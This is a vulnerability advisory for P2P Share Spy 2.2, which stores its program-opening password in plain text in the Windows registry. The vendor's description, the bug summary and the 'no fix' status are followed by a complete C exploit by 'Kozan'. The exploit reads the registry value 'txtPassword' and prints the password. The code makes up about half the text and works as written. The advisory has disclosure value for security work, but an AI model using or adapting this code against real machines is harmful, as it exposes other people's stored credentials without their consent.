--------------------- Application: --------------------- P2P Share Spy 2.2 (and probably prior versions) --------------------- Introduction: --------------------- Vendor: Rebrand Software http://www.rebrandsoftware.com/ Vendor Description: P2P Share Spy can search the Internet/world for computers with publicly shared files. Browsing and downloading is done with Windows Explorer, just like you are sitting in front of the remote computer. That means you can find any file type: MP3, MPG, AVI, DIVX, JPEG. This software is in a category of its own, so don't expect a Kazaa or Morpheus clone. Unlike other P2P programs, you never know what you might find, but finding it is half the fun. New features in version 2.0 include the ability to see remote computer names, new searching options, results tracking, new companion programs. This software does not contain any spyware, adware, or third party programs. --------------------- Bug: --------------------- P2P Share Spy 2.2 stores program opening password in registry with plain text format without crypting and can be viewed by a local user. --------------------- Vendor Confirmed: --------------------- No. --------------------- Fix: --------------------- There is no solution at the time of this entry. --------------------- Exploit: --------------------- ------- C CODE: ------- /***************************************************************** P2P Share Spy 2.2 Local Exploit by Kozan Application: P2P Share Spy 2.2 Vendor: Rebrand Software - www.rebrandsoftware.com Vulnerable Description: P2P Share Spy 2.2 discloses passwords to local users. Discovered & Coded by: Kozan Credits to ATmaCA Web : www.netmagister.com Web2: www.spyinstructors.com Mail: kozan@netmagister.com *****************************************************************/ #include #include #define BUFSIZE 100 HKEY hKey; char Password[BUFSIZE]; DWORD dwBufLen=BUFSIZE; LONG lRet; int main(void) { if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\VB and VBA Program Settings\\P2P Share Spy\\Settings", 0, KEY_QUERY_VALUE, &hKey) == ERROR_SUCCESS) { lRet = RegQueryValueEx( hKey, "txtPassword", NULL, NULL,(LPBYTE) Password, &dwBufLen); if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){ RegCloseKey(hKey); printf("Not found!"); return 0; } RegCloseKey( hKey ); printf("P2P Share Spy 2.2 Local Exploit by Kozan\n"); printf("Credits to ATmaCA\n"); printf("www.netmagister.com - www.spyinstructors.com\n"); printf("kozan@netmagister.com\n\n"); printf("Program Opening Password : %s\n",Password); } else{ printf("P2P Share Spy 2.2 is not installed on your system!\n"); } return 0; }